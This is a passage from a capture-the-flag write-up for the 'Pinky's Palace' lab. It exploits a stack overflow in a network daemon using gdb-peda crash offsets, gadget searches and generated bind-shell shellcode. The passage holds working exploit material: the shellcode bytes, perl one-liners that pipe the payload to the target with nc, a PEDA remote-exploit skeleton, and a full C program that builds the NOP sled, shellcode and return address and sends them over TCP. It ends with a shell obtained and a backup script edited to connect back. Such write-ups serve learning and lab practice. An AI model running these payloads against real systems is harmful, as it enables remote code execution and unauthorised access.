[Attaching after process 456524 fork to child process 456525]
[New inferior 2 (process 456525)]
[Detaching after fork from parent process 456524]
[Inferior 1 (process 456524) detached]
# The daemon forks right after starting. gdb followed the child here (the "Attaching after ... fork to
# child process" lines are what follow-fork-mode child prints), and that child is what hits the breakpoint.

# Create a pattern file to send to the socket to try to overflow it
gdb-peda$ pattern create
Error: missing argument
Generate, search, or write a cyclic pattern to memory
Set "pattern" option for basic/extended pattern type
Usage:
    pattern create size [file]
    pattern offset value
    pattern search
    pattern patch address size
    pattern arg size1 [size2,offset2]
    pattern env size[,offset]

gdb-peda$ pattern create 256 pattern
Writing pattern of 256 chars to filename "pattern"

# In another shell, send the pattern
└─$ cat pattern | nc localhost 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky\'s Palace.
=> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G

# Back in GDB find the crash offset
[Switching to process 456525]
[----------------------------------registers-----------------------------------]
RAX: 0x100 
RBX: 0x0 
RCX: 0x7ffff7eee20c (<__libc_send+28>:	cmp    rax,0xfffffffffffff000)
RDX: 0x100 
RSI: 0x7fffffffcf30 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x4 
RBP: 0x41414e4141384141 ('AA8AANAA')
RSP: 0x7fffffffcfa8 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
RIP: 0x4009aa (<handlecmd+70>:	ret)
R8 : 0x0 
R9 : 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x400840 (<_start>:	xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4009a3 <handlecmd+63>:	call   0x400790 <send@plt>
   0x4009a8 <handlecmd+68>:	nop
   0x4009a9 <handlecmd+69>:	leave  
=> 0x4009aa <handlecmd+70>:	ret    
   0x4009ab <main>:	push   rbp
   0x4009ac <main+1>:	mov    rbp,rsp
   0x4009af <main+4>:	sub    rsp,0x1050
   0x4009b6 <main+11>:	call   0x400820 <[...]@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffcfa8 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0008| 0x7fffffffcfb0 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0016| 0x7fffffffcfb8 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0024| 0x7fffffffcfc0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0032| 0x7fffffffcfc8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0040| 0x7fffffffcfd0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0048| 0x7fffffffcfd8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
0056| 0x7fffffffcfe0 ("AuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "panel" hit Breakpoint 2, 0x00000000004009aa in handlecmd ()

gdb-peda$ patts
Registers contain pattern buffer:
RBP+0 found at offset: 112
Registers point to pattern buffer:
[RSI] --> offset 0 - size ~203
[RSP] --> offset 120 - size ~136
Pattern buffer found at:
0x00007fffffffcc90 : offset  241 - size   15 ($sp + -0x318 [-198 dwords])
0x00007fffffffccb0 : offset  240 - size   16 ($sp + -0x2f8 [-190 dwords])
0x00007fffffffcf30 : offset    0 - size  256 ($sp + -0x78 [-30 dwords])
0x00007fffffffd031 : offset  129 - size  127 ($sp + 0x89 [34 dwords])
References to pattern buffer found at:
0x00007fffffffcb80 : 0x00007fffffffcf30 ($sp + -0x428 [-266 dwords])
0x00007fffffffcba0 : 0x00007fffffffcf30 ($sp + -0x408 [-258 dwords])
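
What patts just did, reimplemented as an added example (not PEDA's code and not from this page): build a cyclic pattern, then map the bytes found in a register back to an offset in what was sent. It uses the Metasploit-style alphabet (Aa0Aa1…) rather than PEDA's, so the bytes differ from the AAA%AAs… string above, but the property relied on is the same: every 3-byte window is unique within the first 20280 bytes, so any 8 bytes pulled out of rbp or [rsp] identify exactly one offset.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern: byte i belongs to triple i/3, made of an
 * upper-case letter, a lower-case letter and a digit. Any 3-byte window is
 * unique within the first 20280 bytes. out must hold len+1 bytes. */
void pattern_create(char *out, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        size_t t = i / 3;
        switch (i % 3) {
        case 0:  out[i] = (char)('A' + (t / 260) % 26); break;
        case 1:  out[i] = (char)('a' + (t / 10) % 26);  break;
        default: out[i] = (char)('0' + t % 10);         break;
        }
    }
    out[len] = '\0';
}

/* Offset of needle (n bytes) inside a patlen-byte pattern, or -1 if absent. */
long pattern_offset(const uint8_t *needle, size_t n, size_t patlen)
{
    char *pat = malloc(patlen + 1);
    if (!pat)
        return -1;
    pattern_create(pat, patlen);
    long off = -1;
    for (size_t i = 0; i + n <= patlen; i++) {
        if (memcmp(pat + i, needle, n) == 0) {
            off = (long)i;
            break;
        }
    }
    free(pat);
    return off;
}

/* The same lookup for a value read out of a 64-bit register. The register
 * holds the overwriting bytes little-endian, so unpack low byte first; this
 * is the computation behind "RBP+0 found at offset: 112". */
long pattern_offset_u64(uint64_t reg, size_t patlen)
{
    uint8_t b[8];
    for (int i = 0; i < 8; i++)
        b[i] = (uint8_t)(reg >> (8 * i));
    return pattern_offset(b, 8, patlen);
}

/* On x86_64 the saved rbp sits 8 bytes below the saved return address, so
 * the offset that ret pops from [rsp] is the rbp offset plus 8. */
long ret_offset_from_rbp_offset(long rbp_off)
{
    return rbp_off < 0 ? -1 : rbp_off + 8;
}

int main(void)
{
    char pat[257];
    pattern_create(pat, 256);
    puts(pat);
    /* Simulate the crash: rbp ends up holding pattern bytes 112..119. */
    uint64_t rbp = 0;
    memcpy(&rbp, pat + 112, 8);   /* x86_64 host: same bytes as the register's LE view */
    long rbp_off = pattern_offset_u64(rbp, 256);
    printf("RBP=0x%016llx -> offset %ld, return address at offset %ld\n",
           (unsigned long long)rbp, rbp_off, ret_offset_from_rbp_offset(rbp_off));
    return 0;
}
```

The lookup works from the register value alone, which is the only thing you have when the crash happens somewhere you cannot inspect the stack; the 8-byte search also catches a partially overwritten slot, because an unaligned match still maps to one offset.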

"RBP+0 found at offset: 112" means the saved rbp sits 112 bytes into our input, exactly the size of the 0x70 local buffer, so the saved return address, which ret pops from [RSP], starts at offset 120; that is the line "[RSP] --> offset 120" is reporting, and 120 is the offset that matters. Note that RIP itself still shows the ret instruction: on x86_64 the CPU will not return to a non-canonical address like 0x4141414141414141, which is why breaking on the ret and reading [RSP] is the right check rather than waiting for a crash with pattern bytes in RIP.

Now the next part of the process is finding a jmp or call we can abuse, and this neat little gdb add-on has something for that too, look!

gdb-peda$ jmpcall
0x400728 : call rax
0x400895 : jmp rax
0x4008e3 : jmp rax
0x40092e : call rax
0x400cfb : call rsp
0x400d6b : call [rax]

This is fucking awesome. We can even generate our shellcode here!!!

gdb-peda$ shellcode generate x86/linux bindport 4444 192.168.2.23
# x86/linux/bindport: 84 bytes
# port=4444, host=192.168.2.23
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)

A caveat on that shellcode: it is 32-bit code (int 0x80, 32-bit registers), and the daemon is a 64-bit process. On x86_64 the int 0x80 compat entry takes its arguments from the 32-bit registers, so every pointer the shellcode builds on the stack (the socketcall argument block, the "/bin//sh" string) is truncated to 32 bits, and a stack at 0x7fff… is out of reach. For a 64-bit target generate 64-bit shellcode instead, for example msfvenom -p linux/x64/shell_bind_tcp LPORT=4444 -f c; the payload layout below stays the same. Also remember that a bind shell listens on the target, so the client side is nc 192.168.2.24 4444, not a local listener.

It even provides skeleton python code for exploiting!!!

gdb-peda$ skeleton
Error: missing argument
Generate python exploit code template
Usage:
    skeleton type [file]
        type = argv: local exploit via argument
        type = env: local exploit via crafted environment (including NULL byte)
        type = stdin: local exploit via stdin
        type = remote: remote exploit via TCP socket

gdb-peda$ skeleton remote

#!/usr/bin/env python
#
# Template for remote TCP exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time

def usage():
    print "Usage: %s host port" % sys.argv[0]
    return

def pattern(size=1024, start=0):
    try:
        bytes = open("pattern.txt").read(size+start)
        return bytes[start:]
    except:
        return "A"*size

def nops(size=1024):
    return "\x90"*size

def int2hexstr(num, intsize=4):
    if intsize == 8:
        if num < 0:
            result = struct.pack("<q", num)
        else:
            result = struct.pack("<Q", num)
    else:
        if num < 0:
            result = struct.pack("<l", num)
        else:
            result = struct.pack("<L", num)
    return result

i2hs = int2hexstr

def list2hexstr(intlist, intsize=4):
    result = ""
    for value in intlist:
        if isinstance(value, str):
            result += value
        else:
            result += int2hexstr(value, intsize)
    return result

l2hs = list2hexstr

from socket import *
import telnetlib
class TCPClient():
    def __init__(self, host, port, debug=0):
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.connect((host, port))

    def debug_log(self, size, data, cmd):
        if self.debug != 0:
            print "%s(%d): %s" % (cmd, size, repr(data))

    def send(self, data, delay=0):
        if delay:
            time.sleep(delay)
        nsend = self.sock.send(data)
        if self.debug > 1:
            self.debug_log(nsend, data, "send")
        return nsend

    def sendline(self, data, delay=0):
        nsend = self.send(data + "\n", delay)
        return nsend

    def recv(self, size=1024, delay=0):
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        buf = ""
        while True:
            c = self.sock.recv(1)
            buf += c
            if delim in buf:
                break
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        buf = self.recv_until("\n")
        return buf

    def close(self):
        self.sock.close()

def exploit(host, port):
    port = int(port)
    client = TCPClient(host, port, debug=1)
    padding = pattern(0)
    payload = [padding]
    payload += ["PAYLOAD"] # put your payload here
    payload = list2hexstr(payload)
    raw_input("Enter to continue")
    client.send(payload)
    try:
        t = telnetlib.Telnet()
        t.sock = client.sock
        t.interact()
        t.close()
    except KeyboardInterrupt:
        pass

if __name__ == "__main__":
    if len(sys.argv) < 3:
        usage()
    else:
        exploit(sys.argv[1], sys.argv[2])

I’m very impressed! Although it’s not exactly what I wanted; I’d rather do that part myself with some quick perl.

# Shellcode is 84 bytes and the return address sits at offset 120, so: 36 NOPs, the 84 bytes of shellcode,
# then the address 0x4008e3 (the jmp rax gadget) little-endian. Only "\xe3\x08\x40" actually lands: strcpy
# stops at the first NUL, which is the address's fourth byte. That is fine here because the slot's upper
# bytes were already zero (the original return address into main is 0x400xxx), so the full 8 bytes still
# read 0x00000000004008e3. It also means the shellcode itself must contain no NUL byte.
$ perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xe3\x08\x40\x00\x00\x00"' 
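
The same layout built in C rather than perl, as an added example (not the author's one-liner and not the box's code), with the two checks the one-liner skips: the shellcode must contain no NUL byte, because strcpy is what moves it into the stack frame, and only the bytes of the address up to its first NUL are copied. The shellcode array is the 84 bytes PEDA generated above, kept as-is so the layout matches (swap in 64-bit shellcode for the 64-bit target as discussed); the return address used is the call rsp gadget from the jmpcall list. Host and port come from the command line.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define RET_OFFSET 120          /* saved rbp at 112, saved return address at 120 */
#define CALL_RSP   0x400cfbULL  /* "call rsp" gadget from PEDA's jmpcall */

/* PEDA's x86/linux bindport 4444 shellcode, byte for byte, from the page. */
const uint8_t shellcode[] = {
    0x31,0xdb,0x53,0x43,0x53,0x6a,0x02,0x6a,0x66,0x58,0x99,0x89,0xe1,0xcd,0x80,0x96,
    0x43,0x52,0x66,0x68,0x11,0x5c,0x66,0x53,0x89,0xe1,0x6a,0x66,0x58,0x50,0x51,0x56,
    0x89,0xe1,0xcd,0x80,0xb0,0x66,0xd1,0xe3,0xcd,0x80,0x52,0x52,0x56,0x43,0x89,0xe1,
    0xb0,0x66,0xcd,0x80,0x93,0x6a,0x02,0x59,0xb0,0x3f,0xcd,0x80,0x49,0x79,0xf9,0xb0,
    0x0b,0x52,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x52,0x53,
    0x89,0xe1,0xcd,0x80
};

/* Index of the first NUL in buf (where strcpy stops), or len if there is none. */
size_t strcpy_copied_len(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return i;
    return len;
}

/* NOP sled + shellcode + 8-byte little-endian return address. Returns the
 * total length, or 0 if the shellcode does not fit before RET_OFFSET or
 * contains a NUL (strcpy would never deliver the rest). */
size_t build_payload(uint8_t *out, size_t outlen,
                     const uint8_t *sc, size_t sclen, uint64_t ret)
{
    if (sclen > RET_OFFSET || outlen < RET_OFFSET + 8)
        return 0;
    if (strcpy_copied_len(sc, sclen) != sclen)
        return 0;
    size_t nops = RET_OFFSET - sclen;
    memset(out, 0x90, nops);
    memcpy(out + nops, sc, sclen);
    for (int i = 0; i < 8; i++)
        out[RET_OFFSET + i] = (uint8_t)(ret >> (8 * i));
    return RET_OFFSET + 8;
}

/* Default payload kept in a global so its bytes can be inspected. */
uint8_t g_payload[256];
size_t build_default(uint64_t ret)
{
    return build_payload(g_payload, sizeof g_payload, shellcode, sizeof shellcode, ret);
}
uint8_t payload_byte(size_t i) { return g_payload[i]; }

/* Connect, swallow the banner, send the payload. Returns bytes sent or -1. */
ssize_t deliver(const char *host, uint16_t port, const uint8_t *payload, size_t len)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, host, &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        close(fd);
        return -1;
    }
    char banner[256];
    (void)recv(fd, banner, sizeof banner, 0);   /* "[+] Welcome to The Daemon [+]" ... */
    ssize_t n = send(fd, payload, len, 0);
    close(fd);
    return n;
}

int main(int argc, char **argv)
{
    size_t len = build_default(CALL_RSP);
    if (len == 0) {
        fputs("shellcode contains a NUL or does not fit before offset 120\n", stderr);
        return 1;
    }
    printf("payload %zu bytes; strcpy will copy the first %zu (it stops at the NUL inside the address)\n",
           len, strcpy_copied_len(g_payload, len));
    if (argc == 3)   /* ./exploit 192.168.2.24 31337 */
        return deliver(argv[1], (uint16_t)atoi(argv[2]), g_payload, len) < 0 ? 1 : 0;
    return 0;
}
```

Run without arguments it only reports the layout; with host and port it delivers the payload. The NUL check is the one worth keeping: a shellcode with a 0x00 byte in it would silently stop the copy early and the return address would never be written.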

Let’s try!

$ perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xe3\x08\x40\x00\x00\x00"' | nc 192.168.2.24 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky\'s Palace.
=> ������������������������������������1�SCSjjfX���̀�CRfh\fS��jfXPQV��̀�f��̀RRVC��f̀�jY�?̀Iy��
                                                                                         Rh//shh/bin��RS��̀@

Exited, no shell popped… hmm. That gadget was the wrong pick: at handlecmd's ret, rax holds the return value of send (0x100 in the crash dump above, the byte count), so jmp rax jumps to address 0x100. The call rsp at 0x400cfb is the useful one: after the ret, rsp points just past the saved return address, and that is the start of main's receive buffer, which still holds the original payload (the second pattern hit in the patts output, offset 129 at $sp+0x89, puts that buffer at $sp+8). Execution lands on the NOP sled there. Let’s try this return address instead:

perl -e 'print "\x90"x36 . "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\xfb\x0c\x40\x00\x00\x00"' | nc 192.168.2.24 31337

Note that the payload carries a bind shell, which listens on the target; the matching client would be nc 192.168.2.24 4444. The listener below is a local one, so whatever connects to it is not that shell:

$ nc -lvp 4444             
listening on [any] 4444 ...
id
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39438
uid=1001(demon) gid=1001(demon) groups=1001(demon)
id
uid=1001(demon) gid=1001(demon) groups=1001(demon)

Wow, are you kidding me? OH FUCK WAIT, THAT BACKUP SCRIPT IS HITTING 4444! I edited the script, tried again, GG:

[screenshot]

My god, this one was the hardest I’ve done by a good margin. It took me FOREVER, but it was very fun, and I learned a lot of new shit!

Directory
$ cd content && tree